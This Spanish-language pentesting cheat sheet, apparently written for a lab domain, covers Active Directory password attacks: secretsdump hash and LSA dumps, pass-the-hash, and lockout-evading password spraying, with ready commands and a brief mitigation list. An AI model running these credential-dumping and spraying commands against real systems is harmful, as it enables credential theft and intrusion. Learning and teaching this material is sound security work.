Ataque de contraseñas

Dump Hashes Locales

En caso de que tener las credenciales de un usuario el cual sea Administrador local, podemos dumpear los hashes locales.

impacket-secretsdump MARVEL.local/pparker:Password123@172.16.0.101

impacket-secretsdump

También, podemos utilizar el hash NTLM

impacket-secretsdump MARVEL.local/pparker@172.16.0.101 -hashes aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71

impacket-secretdump utilizando el hash TLM

Pass The Password

nxc smb 172.16.0.1 -d MARVEL.local -u pparker -p 'Password123' 

pass the password

Pass The Hash

Con los hashes anteriores, podemos llevar a cabo otro ataque conocido como Pass The Hash.

nxc smb 172.16.0.101 -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71'

Dump LSA

nxc smb 172.16.0.101 -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71' --lsa

Dump LSA

Password Spraying

En contraste con un ataque de fuerza bruta convencional, donde se intentan muchas contraseñas diferentes para una sola cuenta de usuario, el password spraying implica intentar un conjunto limitado de contraseñas en múltiples cuentas de usuario. Esto se hace para evitar la detección de bloqueo de cuenta, ya que la tasa de intentos de inicio de sesión fallidos para cada cuenta es baja.

El password spraying aprovecha la tendencia de los usuarios a elegir contraseñas débiles o comunes, así como la reutilización de contraseñas entre múltiples cuentas. Los atacantes pueden obtener listas de cuentas de usuario de manera legítima o mediante técnicas de recopilación de información, y luego intentar iniciar sesión en estas cuentas utilizando contraseñas comunes o basadas en diccionarios.

Pulverización de contraseñas desde Linux

Una vez que hemos creado una lista de usuarios validos, es hora de ejecutar el ataque. Rpcclient es una excelente opción para realizar este ataque desde Linux. Una consideración importante es que un login válido no es inmediatamente aparente con rpcclient, con la respuesta Authority Name indicando un login exitoso. Podemos filtrar los intentos de inicio de sesión no válidos buscando Authority en la respuesta. El siguiente Bash one-liner (adaptado de aquí) puede ser usado para realizar el ataque.

rpcclient

for u in $(cat valid_ad_users.txt); do rpcclient -U "$u%Password123" -c "getusername;quit" 172.16.0.1 | grep Authority; done

kerbrute

 kerbrute passwordspray -d MARVEL.local --dc 172.16.0.1 valid_ad_users.txt 'Password123'

Netexec

nxc smb 172.16.0.1 -u valid_ad_users.txt -p 'Password123' | grep +

Mitigación

• Limitar la reutilización de cuentas

  • Evitar reutilizar contraseñas de Administrador locales.

  • Deshabilitar las cuentas de Invitado (Guest) y Administrador locales.

  • Limitar quien es Administrador local.

• Utilizar contraseñas robustas.